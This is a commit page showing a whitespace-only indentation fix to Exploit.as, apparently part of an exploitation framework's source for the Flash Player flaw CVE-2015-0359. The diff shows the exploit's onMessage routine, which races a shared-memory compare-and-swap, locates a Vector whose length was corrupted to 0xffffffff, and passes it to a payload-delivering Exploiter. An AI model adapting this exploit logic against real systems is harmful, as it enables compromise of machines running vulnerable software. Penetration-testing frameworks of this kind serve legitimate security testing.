Skip to content

Commit 6456256

Browse files
committed
Fix method indentation
1 parent 2bb3a50 commit 6456256

File tree

1 file changed

+9
-9
lines changed

1 file changed

+9
-9
lines changed

external/source/exploits/CVE-2015-0359/Exploit.as

Lines changed: 9 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -96,12 +96,12 @@ package
9696
mc.send("")
9797
}
9898

99-
private function onMessage(e:Event):void
100-
{
101-
var mod:uint = casi32(0, 1022, 0xFFFFFFFF)
102-
Logger.log("[*] Exploit - onMessage(): mod: " + mod.toString())
103-
if (mod == 1022) mc.receive()
104-
else {
99+
private function onMessage(e:Event):void
100+
{
101+
var mod:uint = casi32(0, 1022, 0xFFFFFFFF)
102+
Logger.log("[*] Exploit - onMessage(): mod: " + mod.toString())
103+
if (mod == 1022) mc.receive()
104+
else {
105105
for (var i:uint = 0; i < ov.length; i++) {
106106
if (ov[i].length == 0xffffffff) {
107107
uv = ov[i]
@@ -116,8 +116,8 @@ package
116116
Logger.log("[!] Exploit - onMessage(): Corrupted Vector not found")
117117
return
118118
}
119-
exploiter = new Exploiter(this, platform, os, payload, uv)
120-
}
121-
}
119+
exploiter = new Exploiter(this, platform, os, payload, uv)
120+
}
121+
}
122122
}
123123
}

0 commit comments

Comments
 (0)